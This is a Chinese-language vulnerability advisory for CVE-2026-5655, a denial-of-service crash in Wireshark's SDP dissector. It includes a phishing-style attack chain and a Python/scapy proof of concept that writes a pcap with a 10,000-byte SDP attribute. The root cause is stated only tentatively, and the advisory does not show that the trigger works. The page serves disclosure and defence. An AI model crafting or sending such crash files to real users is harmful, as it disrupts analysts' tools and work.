IPBUF安全漏洞报告
English
CVE-2026-5655 CVSS 5.5 中危

CVE-2026-5655 Wireshark SDP协议解析器拒绝服务漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-5655
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

DoSWiresharkSDPCrashProtocol Dissector

漏洞概述

Wireshark是一款广泛使用的网络协议分析工具。CVE-2026-5655漏洞存在于其4.6.0至4.6.4版本的SDP(会话描述协议)解析器中。由于解析逻辑存在缺陷,攻击者可诱导用户打开包含特制数据包的捕获文件。一旦处理该恶意数据,解析器将发生崩溃,导致应用程序异常终止,从而引发拒绝服务。该漏洞虽需本地交互,但可能干扰网络分析人员的正常工作。

技术细节

该漏洞源于Wireshark的SDP协议解析器在处理畸形数据包时的异常处理机制失效。具体而言,解析器在解析SDP会话描述中的特定字段(如连接信息或媒体属性)时,未对输入数据的长度或格式进行严格的边界检查。当攻击者构造包含超长字符串或非法字符的SDP数据包时,解析器内部状态机可能出现错乱,导致缓冲区越界读取或空指针解引用。根据CVSS向量(AV:L/AC:L/PR:N/UI:R/S:U),攻击需要本地访问权限且依赖用户交互,通常通过发送恶意.pcap文件或诱导解析特定网络流量实现。一旦触发,Wireshark进程将强制终止,造成可用性影响,但通常不影响机密性和完整性。

攻击链分析

STEP 1
1. 侦察
攻击者确认目标用户正在使用易受攻击版本的Wireshark(4.6.0至4.6.4)。
STEP 2
2. 武器化
攻击者构造包含畸形SDP协议字段的恶意网络数据包,并将其封装在.pcap捕获文件中。
STEP 3
3. 投递
攻击者通过钓鱼邮件或文件共享渠道,将恶意.pcap文件发送给目标用户。
STEP 4
4. 利用
目标用户使用Wireshark打开该恶意文件。SDP解析器处理畸形数据时触发异常。
STEP 5
5. 影响
Wireshark应用程序崩溃,停止响应,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
from scapy.all import * from scapy.layers.inet import IP, UDP import sys # Construct a malicious SDP packet payload # This payload simulates an overly long SDP field to trigger the crash malicious_sdp = b"v=0\r\n" malicious_sdp += b"o=- 123456 2 IN IP4 127.0.0.1\r\n" malicious_sdp += b"s=Malicious Session\r\n" malicious_sdp += b"c=IN IP4 127.0.0.1\r\n" malicious_sdp += b"t=0 0\r\n" malicious_sdp += b"m=audio 49170 RTP/AVP 0\r\n" malicious_sdp += b"a=" + b"A" * 10000 + b"\r\n" # Trigger point: Excessive length # Encapsulate in IP/UDP packets (SIP/SDP often runs over UDP) packet = IP(dst="127.0.0.1") / UDP(dport=5060, sport=5060) / Raw(load=malicious_sdp) # Save to pcap file wrpcap("cve_2026_5655_poc.pcap", [packet]) print("[+] PoC file generated: cve_2026_5655_poc.pcap") print("[+] Open this file in Wireshark 4.6.0 - 4.6.4 to reproduce the crash.")

影响范围

Wireshark 4.6.0
Wireshark 4.6.1
Wireshark 4.6.2
Wireshark 4.6.3
Wireshark 4.6.4

防御指南

临时缓解措施
在未升级版本前,建议用户不要打开来源不明的抓包文件。若需分析可疑流量,可在Wireshark的“Analyze”菜单中通过“Enabled Protocols”暂时禁用SDP协议解析器,以规避该风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表